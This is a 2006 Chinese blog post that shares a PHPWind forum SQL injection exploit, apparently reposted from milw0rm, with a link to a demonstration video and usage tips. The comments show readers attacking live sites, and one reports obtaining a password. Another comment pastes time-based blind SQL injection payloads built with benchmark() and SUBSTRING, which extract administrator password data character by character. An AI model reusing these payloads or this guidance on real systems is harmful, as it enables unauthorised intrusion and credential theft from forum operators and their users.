PHPWIND SQL injection exploit [附演示动画]

2006/11/15 8:48 | 鬼仔 | 工具收集 | 占个座先

信息来源:Cnlnfjhh's Blog

前段时间的DZ,这些天的phpwind,闹的老外都关注了。
几天前www.milw0rm.com已经公布了另一个SQL injection exploit
代码大家都已经有了吧,不是剑心的,是国外的。
偶找了个动画给大家观看。
大家先看完这个,再去尝试Sql吧

点我下载动画演示
PS:
-t为时间,一般为10-15分钟
-t10
需要提取phpwind的key,密匙。如果不行就换另一个。

点我下载执行代码
PS:
前提条件:php.ini中的
short_open_tag = off

Tags: , , ,

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  • like | 2006-11-15 10:16 | #

    研究下!!

    呵呵 我也喜欢那个站 不过英文不好了!! :lol:

    回复该留言
  • like | 2006-11-15 10:26 | #

    看过了! 结果和我最后用LINUX测试的差不多,但是返回结果。。。。 很慢!! 而且那个漏洞说是只要低于5.0.1的版本都可以溢出! 我对几个站也试了,答案NO! !

    不知道 为什么 老外也会骗人??

    还是有别的方法?

    回复该留言
  • 叼个烟屁股 | 2006-11-15 11:09 | #

    前两天我就试成功了。。可是不知道这反回来的东西怎么个用法。。郁闷了。。麻烦房东讲讲了。。。

    回复该留言
  • 孤魂 | 2006-11-16 02:04 | #

    成功破解一个,并得到了他的密码

    回复该留言
  • 叼个烟屁股 | 2006-11-16 06:47 | #

    cookie prefix ->
    sql -> 9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,1,1))=0),benchmark(20000
    00,char(0)),-1))/**/AND/**/groupid=3/** MIT/**/1/*
    starttime -> 1163420863
    endtime -> 1163420868
    difftime -> 5
    sql -> 9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,1,1))=48),benchmark(2000
    000,char(0)),-1))/**/AND/**/groupid=3/** MIT/**/1/*
    starttime -> 1163420875
    endtime -> 1163420880
    difftime -> 5

    反回的这些怎么用。。郁闷了。不明白。。

    回复该留言
  • 鬼仔 | 2006-11-24 05:13 | #

    呵呵,具体的我也没测试。

    回复该留言

发表评论